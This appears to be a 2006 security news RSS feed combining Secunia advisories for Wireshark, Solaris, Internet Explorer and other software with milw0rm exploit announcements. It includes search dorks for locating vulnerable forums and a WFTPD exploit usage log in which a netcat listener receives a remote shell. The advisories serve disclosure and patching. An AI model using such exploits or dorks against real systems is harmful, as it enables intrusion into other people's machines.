            <description><![CDATA[Secunia Advisory:	SA21597	Print Advisory  <br>
Release Date:	2006-08-24<br>
<br>
Critical:	<br>
Highly critical<br>
Impact:	DoS<br>
System access<br>
Where:	From remote<br>
Solution Status:	Vendor Patch<br>
<br>
Software:	Wireshark (formerly Ethereal) 0.x<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
Description:<br>
Some vulnerabilities have been reported in Wireshark, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system.<br>
<br>
1) An unspecified error within the SCSI protocol dissector can be exploited to crash the application.<br>
<br>
2) Off-by-one errors exist in the IPSec ESP preference parser. Successful exploitation requires that Wireshark has been compiled with ESP decryption support.<br>
<br>
3) Errors in the DHCP dissector and potentially other protocol dissectors can be exploited to crash Wireshark due to a bug in Glib. This only affects the Windows version.<br>
<br>
4) An error within the Q.2391 dissector can be exploited to cause a DoS due to memory consumption.<br>
<br>
Successful exploitation of the vulnerabilities may cause Wireshark to stop responding, consume large amounts of system memory, crash, or execute arbitrary code.<br>
<br>
Solution:<br>
Update to version 0.99.3.<br>
<br>
Provided and/or discovered by:<br>
Reported by the vendor.<br>
<br>
Original Advisory:<br>
http://www.wireshark.org/security/wnpa-sec-2006-02.html]]></description>
            <link>http://secunia.com/advisories/21597/</link>
            <pubDate>Thu, 24 Aug 2006 09:36:18 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: phpBB All Topics Mod -= 1.5.0 (start) Remote SQL Injection Exploit</title>
            <description>++++++++++++++++++++++++++++++++++++++++++++++++++++++&lt;br&gt;
+                                                    +&lt;br&gt;
+ phpBB 2.0.21 (alltopics.php) SQL Injection Exploit +&lt;br&gt;
+                                                    +&lt;br&gt;
+                  bd0rk || SOH-Crew                 +&lt;br&gt;
+                                                    +&lt;br&gt;
+    Mod: http://www.phpbbhacks.com/download/2821    +&lt;br&gt;
+                                                    +&lt;br&gt;
++++++++++++++++++++++++++++++++++++++++++++++++++++++</description>
            <link>http://www.milw0rm.com/exploits/2248</link>
            <pubDate>Wed, 23 Aug 2006 12:08:26 -0400</pubDate>
        </item>

        <item>
            <title>Exploit:Solaris 8 / 9 (/usr/ucb/ps) Local Information Leak Exploit</title>
            <description><![CDATA[# $Id: raptor_ucbps,v 1.1 2006/07/26 12:15:42 raptor Exp $<br>
#<br>
# raptor_ucbps - information leak with Solaris /usr/ucb/ps<br>
# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info><br>
#<br>
# A security vulnerability in the "/usr/ucb/ps" (see ps(1B)) command may allow <br>
# unprivileged local users the ability to see environment variables and their <br>
# values for processes which belong to other users (Sun Alert ID: 102215).<br>
#<br>
# Absolutely nothing fancy, but it may turn out to be useful;)]]></description>
            <link>http://www.milw0rm.com/exploits/2242</link>
            <pubDate>Wed, 23 Aug 2006 11:56:54 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: Mozilla Firefox -= 1.5.0.6 (FTP Request) Remote Denial of Service Exploit</title>
            <description>#author: tomas kempinsky&lt;br&gt;&lt;br&gt;</description>
            <link>http://www.milw0rm.com/exploits/2244</link>
            <pubDate>Wed, 23 Aug 2006 11:56:01 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: Simple Machines Forum -= 1.1.RC2 &quot;lock&quot;/Zend_Hash_Del_Key_Or_Index Vulnerability</title>
            <description>--------------------------------------------------------------------------------&lt;br&gt;
Simple Machines Forum &lt;= 1.1.RC2 &quot;lock&quot;/Zend_Hash_Del_Key_Or_Index Vulnerability&lt;br&gt;
by rgod rgod@autistici.org&lt;br&gt;
site: http://retrogod.altervista.org&lt;br&gt;
dork, version specific: &quot;Powered by SMF&quot;&lt;br&gt;
--------------------------------------------------------------------------------&lt;br&gt;
');</description>
            <link>http://www.milw0rm.com/exploits/2243</link>
            <pubDate>Wed, 23 Aug 2006 11:55:08 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: MercuryBoard -= 1.1.4 &quot;User-Agent&quot; SQL injection / privilege escalation exploit</title>
            <description><![CDATA[--------------------------------------------------------------------------------<br>
MercuryBoard <= 1.1.4 "User-Agent" SQL injection / privilege escalation exploit<br>
(php version)<br>
by rgod rgod@autistici.org<br>
site: http://retrogod.altervista.org<br>
dork: "Powered by MercuryBoard"<br>
--------------------------------------------------------------------------------<br>
');<br>
/*<br>
works regardless of php.ini settings<br>
against MySQL> 4.1 (allowing subs)<br>
original exploit: http://www.milw0rm.com/exploits/1058 coded by 1dt.w0lf<br>
not working for me, so I wrote my version<br>
vulnerability is actually unpatched...<br>
*/]]></description>
            <link>http://www.milw0rm.com/exploits/2247</link>
            <pubDate>Wed, 23 Aug 2006 11:52:34 -0400</pubDate>
        </item>

        <item>
            <title>Sun Solaris RBAC Profile Privilege Escalation Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:	SA21581	Print Advisory  <br>
Release Date:	2006-08-23<br>
<br>
Critical:	<br>
Less critical<br>
Impact:	Privilege escalation<br>
Where:	Local system<br>
Solution Status:	Vendor Patch<br>
<br>
OS:	Sun Solaris 10<br>
Sun Solaris 8<br>
Sun Solaris 9<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
Description:<br>
Some vulnerabilities have been reported in Sun Solaris, which can be exploited by malicious, local users to gain escalated privileges.<br>
<br>
1) An unspecified error in the default configuration of the Role-Based Access Control (RBAC) associated with the "File System Management" profile can be exploited to execute arbitrary commands with "root" privileges.<br>
<br>
The vulnerability affects Sun Solaris 8 and 9 for both the SPARC and x86 platform.<br>
<br>
2) An unspecified error exists in the "format" command. This allows a user, who has been granted the "File System Management" RBAC profile or similar, to write to device files with "root" privileges.<br>
<br>
The vulnerability affects Sun Solaris 8 and 9 for both the SPARC and x86 platform.<br>
<br>
3) A boundary error in the "format" command can be exploited to cause a buffer overflow. This allows a user, who has been granted the "File System Management" RBAC profile or similar, to execute arbitrary code with "root" privileges.<br>
<br>
The vulnerability affects Sun Solaris 8, 9, and 10 for both the SPARC and x86 platform.<br>
<br>
Solution:<br>
Apply patches.<br>
<br>
-- SPARC Platform --<br>
<br>
Solaris 8:<br>
Apply patch 108975-10 or later.<br>
http://sunsolve.sun.com/search/d...y=urn:cds:docid:1-21-108975-10-1<br>
<br>
Solaris 9:<br>
Apply patch 113072-08 or later.<br>
http://sunsolve.sun.com/search/d...y=urn:cds:docid:1-21-113072-08-1<br>
<br>
Solaris 10:<br>
Apply patch 118833-18 or later.<br>
http://sunsolve.sun.com/search/d...y=urn:cds:docid:1-21-118833-18-1<br>
<br>
-- x86 Platform --<br>
<br>
Solaris 8:<br>
Apply patch 108976-10 or later.<br>
http://sunsolve.sun.com/search/d...y=urn:cds:docid:1-21-108976-10-1<br>
<br>
Solaris 9:<br>
Apply patch 114423-07 or later.<br>
http://sunsolve.sun.com/search/d...y=urn:cds:docid:1-21-114423-07-1<br>
<br>
Solaris 10:<br>
Apply patch 118997-09 or later.<br>
http://sunsolve.sun.com/search/d...y=urn:cds:docid:1-21-118997-09-1<br>
<br>
Provided and/or discovered by:<br>
Reported by the vendor.<br>
<br>
Original Advisory:<br>
Sun Microsystems:<br>
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102514-1<br>
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102519-1<br>
<br>
<br>
]]></description>
            <link>http://secunia.com/advisories/21581/</link>
            <pubDate>Wed, 23 Aug 2006 11:50:56 -0400</pubDate>
        </item>

        <item>
            <title>Internet Explorer URL Parsing Buffer Overflow Vulnerability</title>
            <description><![CDATA[Secunia Advisory:	SA21557	Print Advisory  <br>
Release Date:	2006-08-23<br>
<br>
Critical:	<br>
Highly critical<br>
Impact:	System access<br>
Where:	From remote<br>
Solution Status:	Vendor Workaround<br>
<br>
Software:	Microsoft Internet Explorer 6.x<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
CVE reference:	CVE-2006-3869<br>
<br>
Description:<br>
A vulnerability has been reported in Internet Explorer, which can be exploited by malicious people to compromise a user's system.<br>
<br>
The vulnerability is caused due to a boundary error when processing URLs on a website using HTTP 1.1 and compression. This can be exploited to cause a heap-based buffer overflow via an overly long URL (more than about 500 bytes).<br>
<br>
Successful exploitation allows execution of arbitrary code when a user is e.g. tricked into visiting a malicious website.<br>
<br>
The vulnerability affects Internet Explorer 6 SP1 on Windows 2000 and Windows XP SP1 and was introduced by the MS06-042 patches.<br>
<br>
Solution:<br>
The vendor recommends disabling the HTTP 1.1 protocol in Internet Explorer (see the vendor's advisory for details).<br>
<br>
Provided and/or discovered by:<br>
Dejan Kovacevic, Bold Internet Solutions.<br>
Derek Soeder, eEye Digital Security.<br>
<br>
Changelog:<br>
2006-08-23: Added additional information.<br>
<br>
Original Advisory:<br>
Microsoft:<br>
http://www.microsoft.com/technet/security/advisory/923762.mspx<br>
http://support.microsoft.com/kb/923762/<br>
<br>
Other References:<br>
US-CERT VU#821156:<br>
http://www.kb.cert.org/vuls/id/821156<br>
]]></description>
            <link>http://secunia.com/advisories/21557/</link>
            <pubDate>Wed, 23 Aug 2006 11:50:07 -0400</pubDate>
        </item>

        <item>
            <title>Empire CMS &quot;check_path&quot; File Inclusion Vulnerability</title>
            <description><![CDATA[Secunia Advisory:	SA21584	Print Advisory  <br>
Release Date:	2006-08-23<br>
<br>
Critical:	<br>
Highly critical<br>
Impact:	System access<br>
Where:	From remote<br>
Solution Status:	Unpatched<br>
<br>
Software:	Empire CMS 3.x<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
Description:<br>
Bob Linuson has discovered a vulnerability in Empire CMS, which can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
Input passed to the "check_path" parameter in e/class/CheckLevel.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local and external resources.<br>
<br>
The vulnerability has been confirmed in version 3.7. Other versions may also be affected.<br>
<br>
Solution:<br>
Edit the source code to ensure that input is properly verified.<br>
<br>
Provided and/or discovered by:<br>
Bob Linuson<br>
]]></description>
            <link>http://secunia.com/advisories/21584/</link>
            <pubDate>Wed, 23 Aug 2006 11:48:17 -0400</pubDate>
        </item>

        <item>
            <title>MDaemon POP3 Server Buffer Overflow Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:	SA21595	Print Advisory  <br>
Release Date:	2006-08-23<br>
<br>
Critical:	<br>
Moderately critical<br>
Impact:	System access<br>
Where:	From local network<br>
Solution Status:	Vendor Patch<br>
<br>
Software:	MDaemon 8.x<br>
MDaemon 9.x<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
Description:<br>
INFIGO IS has discovered some vulnerabilities in MDaemon, which can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
The vulnerabilities are due to boundary errors in the POP3 server and can be exploited to cause a heap-based buffer overflow by supplying an overly long string to the "USER" or "APOP" command.<br>
<br>
Successful exploitation allows execution of arbitrary code.<br>
<br>
The vulnerabilities have been confirmed in version 9.0.5. Prior versions may also be affected.<br>
<br>
Solution:<br>
Update to version 9.0.6.<br>
<br>
Provided and/or discovered by:<br>
Sasa Jusic and Leon Juranic, INFIGO IS<br>
<br>
Original Advisory:<br>
http://www.infigo.hr/en/in_focus/advisories/INFIGO-2006-08-04]]></description>
            <link>http://secunia.com/advisories/21595/</link>
            <pubDate>Wed, 23 Aug 2006 11:47:46 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: SportsPHool &quot;mainnav&quot; File Inclusion Vulnerability</title>
            <description><![CDATA[Secunia Advisory:	SA21594	Print Advisory  <br>
Release Date:	2006-08-21<br>
<br>
Critical:	<br>
Highly critical<br>
Impact:	System access<br>
Where:	From remote<br>
Solution Status:	Unpatched<br>
<br>
Software:	SportsPHool 1.x<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
Description:<br>
Kacper has discovered a vulnerability in SportsPHool, which can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
Input passed to the "mainnav" parameter in includes/layout/plain.footer.php is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.<br>
<br>
Successful exploitation requires that "register_globals" is enabled.<br>
<br>
The vulnerability has been confirmed in version 1.0. Other versions may also be affected.<br>
<br>
Solution:<br>
Edit the source code to ensure that input is properly verified.<br>
<br>
Provided and/or discovered by:<br>
Kacper<br>
<br>
Original Advisory:<br>
http://milw0rm.com/exploits/2227<br>
<br>
<br>
]]></description>
            <link>http://secunia.com/advisories/21594/</link>
            <pubDate>Tue, 22 Aug 2006 14:11:38 -0400</pubDate>
        </item>

        <item>
            <title>Dolphin &quot;dir[inc]&quot; File Inclusion Vulnerability</title>
            <description><![CDATA[Secunia Advisory:	SA21535	Print Advisory  <br>
Release Date:	2006-08-22<br>
<br>
Critical:	<br>
Highly critical<br>
Impact:	System access<br>
Where:	From remote<br>
Solution Status:	Unpatched<br>
<br>
Software:	Dolphin 5.x<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
CVE reference:	CVE-2006-4189<br>
<br>
Description:<br>
A vulnerability has been discovered in Dolphin, which can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
Input passed to the "dir[inc]" parameter in templates/tmpl_dfl/scripts/index.php is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.<br>
<br>
Successful exploitation requires that "register_globals" is enabled.<br>
<br>
The vulnerability has been confirmed in version 5.2. Other versions may also be affected.<br>
<br>
Solution:<br>
Edit the source code to ensure that input is properly verified.<br>
<br>
Provided and/or discovered by:<br>
Reported by an anonymous person.<br>
]]></description>
            <link>http://secunia.com/advisories/21535/</link>
            <pubDate>Tue, 22 Aug 2006 14:10:41 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: Empire CMS -=3.7 (checklevel.php) Remote File Include Vulnerability</title>
            <description>    Empire CMS &lt;=3.7 (checklevel.php) Remote File Include Vulnerability&lt;br&gt;
           Find by: Bob Linuson&lt;br&gt;&lt;br&gt;</description>
            <link>http://www.milw0rm.com/exploits/2239</link>
            <pubDate>Tue, 22 Aug 2006 14:10:00 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: HPE v0.6.1  Remote File Inclusion Vulnerability</title>
            <description>HPE v0.6.1  Remote File Inclusion Vulnerability</description>
            <link>http://www.milw0rm.com/exploits/2240</link>
            <pubDate>Tue, 22 Aug 2006 14:07:42 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: Solaris 10 sysinfo(2) Local Kernel Memory Disclosure Exploit</title>
            <description><![CDATA[/*<br>
 * $Id: raptor_sysinfo.c,v 1.2 2006/08/22 13:47:54 raptor Exp $<br>
 *<br>
 * raptor_sysinfo.c - Solaris sysinfo(2) kernel memory leak<br>
 * Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info><br>
 *<br>
 * systeminfo.c for Sun Solaris allows local users to read kernel memory via <br>
 * a 0 variable count argument to the sysinfo system call, which causes a -1 <br>
 * argument to be used by the copyout function. NOTE: this issue has been <br>
 * referred to as an integer overflow, but it is probably more like a <br>
 * signedness error or integer underflow (CVE-2006-3824).<br>
 *<br>
 * http://en.wikipedia.org/wiki/Pitagora_Suicchi<br>
 *<br>
 * Greets to prdelka, who also exploited this vulnerability.<br>
 *<br>
 * I should also definitely investigate the old sysinfo(2) vulnerability <br>
 * described in CVE-2003-1062, affecting Solaris/SPARC 2.6 through 9 and <br>
 * Solaris/x86 2.6 through 8... It may come in handy sooner or later;)<br>
 *]]></description>
            <link>http://www.milw0rm.com/exploits/2241</link>
            <pubDate>Tue, 22 Aug 2006 13:43:39 -0400</pubDate>
        </item>

        <item>
            <title>Milw0rm exploits of the day</title>
            <description><![CDATA[2006-08-21	WFTPD 3.23 (SIZE) Remote Buffer Overflow Exploit
2006-08-21	Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit (PoC)
2006-08-19	MS Windows CanonicalizePathName() Remote Exploit (MS06-040)<br>
2006-08-16	PHP <= 4.4.3 / 5.1.4 (sscanf) Local Buffer Overflow Exploit<br>
8/21/06	PHProjekt <= 6.1 (path_pre) Multiple Remote File Include Vulnerabilities<br>
8/21/06	PHlyMail Lite <= 3.4.4 (folderprops.php) Remote Include Vulnerability (2)<br>
8/20/06	NES Game and NES System <= c108122 File Include Vulnerabilities<br>
8/20/06	SportsPHool <= 1.0 (mainnav) Remote File Include Vulnerability<br>
8/20/06	SimpleBlog <= 2.0 (comments.asp) Remote SQL Injection Vulnerability<br>
8/20/06	Shadows Rising RPG <= 0.0.5b Remote File Include Vulnerabilities<br>
8/20/06	LBlog <= 1.05 (comments.asp) Remote SQL Injection Vulnerability<br>
8/20/06	Simple Machines Forum <= 1.1 rc2 (lngfile) Remote Exploit (windows)<br>
8/20/06	SimpleBlog <= 2.0 (comments.asp) Remote SQL Injection Exploit<br>
8/19/06	Mambo cropimage Component <= 1.0 Remote File Include Vulnerability<br>
8/19/06	interact <= 2.2 (CONFIG[BASE_PATH]) Remote File Include Vulnerability<br>
8/19/06	Joomla <=1.0.10 (poll component) Arbitrary Add Votes Exploit<br>
8/19/06	Tutti Nova <= 1.6 (TNLIB_DIR) Remote File Include Vulnerability<br>
8/19/06	Fantastic News <= 2.1.3 (script_path) Remote File Include Vulnerability<br>
8/19/06	Mambo com_lurm_constructor Component <= 0.6b Include Vulnerability<br>
8/19/06	ZZ:FlashChat <= 3.1 (adminlog) Remote File Incude Vulnerability<br>
8/19/06	mambo com_babackup Component <= 1.1 File Include Vulnerability<br>
8/18/06	Joomla Artlinks Component <= 1.0b4 Remote Include Vulnerability<br>
8/18/06	PHlyMail Lite <= 3.4.4 (mod.listmail.php) Remote Include Vulnerability<br>
8/18/06	phpCodeGenie <= 3.0.2 (BEAUT_PATH) Remote File Include Vulnerability<br>
8/18/06	Mambo MamboWiki Component <= 0.9.6 Remote Include Vulnerability<br>
8/18/06	Joomla Link Directory Component <= 1.0.3 Remote Include Vulnerability<br>
8/18/06	Joomla Kochsuite Component <= 0.9.4 Remote File Include Vulnerability<br>
8/18/06	Sonium Enterprise Adressbook <= 0.2 (folder) Include Vulnerability<br>
8/17/06	Woltlab Burning Board <= 2.3.5 (links.php) SQL Injection Exploit (2)<br>
8/17/06	CubeCart <= 3.0.11 (oid) Remote Blind SQL Injection Exploit<br>
8/17/06	IRSR <= 0.2 (_sysSessionPath) Remote File Include Vulnerability<br>
8/17/06	WTcom <= 0.2.4-alpha (torrents.php) Remote SQL Injection Vulnerability<br>
8/17/06	POWERGAP <= 2003 (s0x.php) Remote File Include Vulnerability<br>
8/17/06	Mambo mambelfish Component <= 1.1 Remote File Include Vulnerability<br>
]]></description>
            <link>http://milw0rm.org/exploits/</link>
            <pubDate>Mon, 21 Aug 2006 13:19:51 -0400</pubDate>
        </item>

        <item>
            <title>ZERO-DAY: WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit</title>
            <description><![CDATA[/*<br>
* wftpd_exp.c<br>
* WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit<br>
* coded by h07 <h07@interia.pl> <br>
* tested on XP SP2 polish, 2000 SP4 polish<br>
* example..<br>
<br>
C:\>wftpd_exp 0 0 192.168.0.2 h07 open 192.168.0.1 4444<br>
<br>
[*] WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit<br>
[*] coded by h07 <h07@interia.pl><br>
[*] FTP response: 331 Give me your password, please<br>
[*] FTP response: 230 Logged in successfully<br>
[+] sending buffer: ok<br>
[*] press enter to quit<br>
<br>
C:\>nc -l -p 4444<br>
Microsoft Windows XP [Wersja 5.1.2600]<br>
(C) Copyright 1985-2001 Microsoft Corp.<br>
<br>
C:\wftpd323><br>
*/]]></description>
            <link>http://www.milw0rm.com/exploits/2233</link>
            <pubDate>Mon, 21 Aug 2006 09:14:52 -0400</pubDate>
        </item>

        <item>
            <title>Zero Day PowerPoint Vulnerability - Active Exploits</title>
            <description>This is Frequently Asked Questions document about the latest zero-day vulnerability in Microsoft PowerPoint. The document describes related malwares as well.&lt;br&gt;
NOTE: CVE name in the title will be updated immediately when CVE name is available.</description>
            <link>http://blogs.securiteam.com/index.php/archives/559</link>
            <pubDate>Mon, 21 Aug 2006 09:13:42 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: OPT Max &quot;CRM_inc&quot; Parameter File Inclusion Vulnerability</title>
            <description><![CDATA[Secunia Advisory:	SA21517	Print Advisory  <br>
Release Date:	2006-08-17<br>
<br>
Critical:	<br>
Highly critical<br>
Impact:	System access<br>
Where:	From remote<br>
Solution Status:	Unpatched<br>
<br>
Software:	Outreach Project Tool<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
Description:<br>
Kacper has reported a vulnerability in OPT Max, which can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
Input passed to the "CRM_inc" parameter in include/urights.php isn't properly verified, before it is used to include files. This can be exploited to include arbitrary files from external and local resources.<br>
<br>
The vulnerability has been reported in version 1.2.6. Other versions may also be affected.<br>
<br>
Solution:<br>
Edit the source code to ensure that input is properly verified.<br>
<br>
Provided and/or discovered by:<br>
Kacper<br>
<br>
Original Advisory:<br>
http://milw0rm.com/exploits/2192]]></description>
            <link>http://secunia.com/advisories/21517/</link>
            <pubDate>Mon, 21 Aug 2006 09:13:19 -0400</pubDate>
        </item>

        <item>
            <title>SUSE update for MozillaFirefox, MozillaThunderbird, and Seamonkey</title>
            <description><![CDATA[Secunia Advisory:	SA21529	Print Advisory  <br>
Release Date:	2006-08-17<br>
<br>
Critical:	<br>
Highly critical<br>
Impact:	Cross Site Scripting<br>
DoS<br>
System access<br>
Where:	From remote<br>
Solution Status:	Vendor Patch<br>
<br>
OS:	SUSE Linux 10<br>
SUSE Linux 10.1<br>
SUSE Linux 9.2<br>
SUSE Linux 9.3<br>
<br>
	Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.<br>
<br>
CVE reference:	CVE-2006-3113<br>
CVE-2006-3677<br>
CVE-2006-3801<br>
CVE-2006-3802<br>
CVE-2006-3803<br>
CVE-2006-3804<br>
CVE-2006-3805<br>
CVE-2006-3806<br>
CVE-2006-3807<br>
CVE-2006-3808<br>
CVE-2006-3809<br>
CVE-2006-3810<br>
CVE-2006-3811<br>
CVE-2006-3812<br>
<br>
Description:<br>
SUSE has issued an update for MozillaFirefox, MozillaThunderbird and Seamonkey. These fix some vulnerabilities, which can be exploited by malicious people to conduct cross-site scripting attacks and compromise a user's system.<br>
<br>
For more information:<br>
SA19873<br>
SA21228<br>
SA21229<br>
<br>
Solution:<br>
Apply updated packages.<br>
<br>
x86 Platform:<br>
<br>
SUSE LINUX 10.1:<br>
ftp://ftp.suse.com/pub/suse/upda...illaFirefox-1.5.0.6-1.3.i586.rpm<br>
b077ab8d63cbca9fad680e31faa34d80<br>
ftp://ftp.suse.com/pub/suse/upda...ranslations-1.5.0.6-1.3.i586.rpm<br>
083893020c930fb8d0d2ac107e6afcb2<br>
ftp://ftp.suse.com/pub/suse/upda...Thunderbird-1.5.0.5-0.1.i586.rpm<br>
857642c909f7184dc1a6441025c57d82<br>
ftp://ftp.suse.com/pub/suse/upda...ranslations-1.5.0.5-0.1.i586.rpm<br>
41cdd09824e46732fe0160d2eea1db13<br>
ftp://ftp.suse.com/pub/suse/upda...586/seamonkey-1.0.4-2.1.i586.rpm<br>
eecf97bedf164629445589bf5fe96f3a<br>
ftp://ftp.suse.com/pub/suse/upda...nkey-calendar-1.0.4-2.1.i586.rpm<br>
9817cd23edbe982c54e8e9788b068272<br>
ftp://ftp.suse.com/pub/suse/upda...dom-inspector-1.0.4-2.1.i586.rpm<br>
acc5e00265da3c37d75dd8467e942523<br>
ftp://ftp.suse.com/pub/suse/upda...seamonkey-irc-1.0.4-2.1.i586.rpm<br>
7a00bd110f7f36a7adac792b4d385cf2<br>
ftp://ftp.suse.com/pub/suse/upda...eamonkey-mail-1.0.4-2.1.i586.rpm<br>
507c561f4179f75652550dea985fd5c5<br>
ftp://ftp.suse.com/pub/suse/upda...-spellchecker-1.0.4-2.1.i586.rpm<br>
0e528364b0a47d8cc186be99c9273680<br>
ftp://ftp.suse.com/pub/suse/upda...onkey-venkman-1.0.4-2.1.i586.rpm<br>
0756055ab6c663c03520a566e748fd84<br>
<br>
SUSE LINUX 10.0:<br>
ftp://ftp.suse.com/pub/suse/i386...illaFirefox-1.5.0.6-1.2.i586.rpm<br>
169195ef8d8d6aa42578c52301637a7b<br>
ftp://ftp.suse.com/pub/suse/i386...ranslations-1.5.0.6-1.2.i586.rpm<br>
ce2ca0073cb95cd52908eca9162f12db<br>
ftp://ftp.suse.com/pub/suse/i386...Thunderbird-1.5.0.5-0.1.i586.rpm<br>
82c3c849160d835d7dd2e83d58ab46ed<br>
<br>
SUSE LINUX 9.3:<br>
ftp://ftp.suse.com/pub/suse/i386...illaFirefox-1.5.0.6-1.4.i586.rpm<br>
45252c09a02b7947e2dcff6c7b2680f7<br>
ftp://ftp.suse.com/pub/suse/i386...ranslations-1.5.0.6-1.4.i586.rpm<br>
3f916156c178db203e19854f1be14a6e<br>
ftp://ftp.suse.com/pub/suse/i386...Thunderbird-1.5.0.5-0.1.i586.rpm<br>
3878dfec4b42ebf979488794dd5ba153<br>
<br>
SUSE LINUX 9.2:<br>
ftp://ftp.suse.com/pub/suse/i386...illaFirefox-1.5.0.6-1.4.i586.rpm<br>
1a6ec1263972cc8ee19b4b88112cbc91<br>
ftp://ftp.suse.com/pub/suse/i386...ranslations-1.5.0.6-1.4.i586.rpm<br>
10b2b66061b686aab364255edfc7330f<br>
ftp://ftp.suse.com/pub/suse/i386...Thunderbird-1.5.0.5-0.1.i586.rpm<br>
d7a39ac5e59594f326c0a7ebf893025a<br>
<br>
Power PC Platform:<br>
<br>
SUSE LINUX 10.1:<br>
ftp://ftp.suse.com/pub/suse/upda...zillaFirefox-1.5.0.6-1.3.ppc.rpm<br>
beb4517859e09e23b1c1b8e6fe9f7f1b<br>
ftp://ftp.suse.com/pub/suse/upda...translations-1.5.0.6-1.3.ppc.rpm<br>
f9f7424e954609520a7dcfa5401aa6a0<br>
ftp://ftp.suse.com/pub/suse/upda...aThunderbird-1.5.0.5-0.1.ppc.rpm<br>
a3810db291a8575ec602046534ac0046<br>
ftp://ftp.suse.com/pub/suse/upda...translations-1.5.0.5-0.1.ppc.rpm<br>
1c3f6bdab05076e177c39900b8796291<br>
ftp://ftp.suse.com/pub/suse/upda.../ppc/seamonkey-1.0.4-2.1.ppc.rpm<br>
2a57cf8e9d58c738d08f3457b18c39c8<br>
ftp://ftp.suse.com/pub/suse/upda...onkey-calendar-1.0.4-2.1.ppc.rpm<br>
5e5b4e2bc287c6b9fa8dcd920bd5691f<br>
ftp://ftp.suse.com/pub/suse/upda...-dom-inspector-1.0.4-2.1.ppc.rpm<br>
2b6d0f991fdf834704a717a9da239114<br>
ftp://ftp.suse.com/pub/suse/upda.../seamonkey-irc-1.0.4-2.1.ppc.rpm<br>
8130da7cdb4ece3a5b3ffcd1d8de6604<br>
ftp://ftp.suse.com/pub/suse/upda...seamonkey-mail-1.0.4-2.1.ppc.rpm<br>
42a37ed33a80d3a9c7922b260ec8d017<br>
ftp://ftp.suse.com/pub/suse/upda...y-spellchecker-1.0.4-2.1.ppc.rpm<br>
7ed788d6b9eaaa450c7bdef217d1da0b<br>
ftp://ftp.suse.com/pub/suse/upda...monkey-venkman-1.0.4-2.1.ppc.rpm<br>
22bef32ee56511c1527f2aba2686c31b<br>
<br>
SUSE LINUX 10.0:<br>
ftp://ftp.suse.com/pub/suse/i386...zillaFirefox-1.5.0.6-1.2.ppc.rpm<br>
7088063ef61fef41e8ae463017bc2e7a<br>
ftp://ftp.suse.com/pub/suse/i386...translations-1.5.0.6-1.2.ppc.rpm<br>
1179980ccb74d1268981a991ea99ef76<br>
ftp://ftp.suse.com/pub/suse/i386...aThunderbird-1.5.0.5-0.1.ppc.rpm<br>
50989117d508769abe562192f7a29ac0<br>
<br>
x86-64 Platform:<br>
<br>
SUSE LINUX 10.1:<br>
ftp://ftp.suse.com/pub/suse/upda...underbird-1.5.0.5-0.1.x86_64.rpm<br>
c3c35689ec4183a3f65eadefe0e035f9<br>
ftp://ftp.suse.com/pub/suse/upda...nslations-1.5.0.5-0.1.x86_64.rpm<br>
c2a68df8c7a37edb184de0d816bc6f40<br>
ftp://ftp.suse.com/pub/suse/upda...4/seamonkey-1.0.4-2.1.x86_64.rpm<br>
2c9f593099e65d8a4bea1ddb4475b51b<br>
ftp://ftp.suse.com/pub/suse/upda...ey-calendar-1.0.4-2.1.x86_64.rpm<br>
546d70365782daeae85bc2a5e042bae6<br>
ftp://ftp.suse.com/pub/suse/upda...m-inspector-1.0.4-2.1.x86_64.rpm<br>
1b985d53285222446923fb37d936d759<br>
ftp://ftp.suse.com/pub/suse/upda...amonkey-irc-1.0.4-2.1.x86_64.rpm<br>
c81a87ba73ed766dc25f2b89b98f4f8e<br>
ftp://ftp.suse.com/pub/suse/upda...monkey-mail-1.0.4-2.1.x86_64.rpm<br>
36ca5818bb717578542d7def4b8724f9<br>
ftp://ftp.suse.com/pub/suse/upda...pellchecker-1.0.4-2.1.x86_64.rpm<br>
2c798a9aa382ff0bc6f0d44c1861156d<br>
ftp://ftp.suse.com/pub/suse/upda...key-venkman-1.0.4-2.1.x86_64.rpm<br>
b6f3a089873cf2df5d82e7fcc4943b28<br>
<br>
SUSE LINUX 10.0:<br>
ftp://ftp.suse.com/pub/suse/i386...underbird-1.5.0.5-0.1.x86_64.rpm<br>
64b491ee5e76fd81d22e6bc03efe6b86<br>
<br>
SUSE LINUX 9.3:<br>
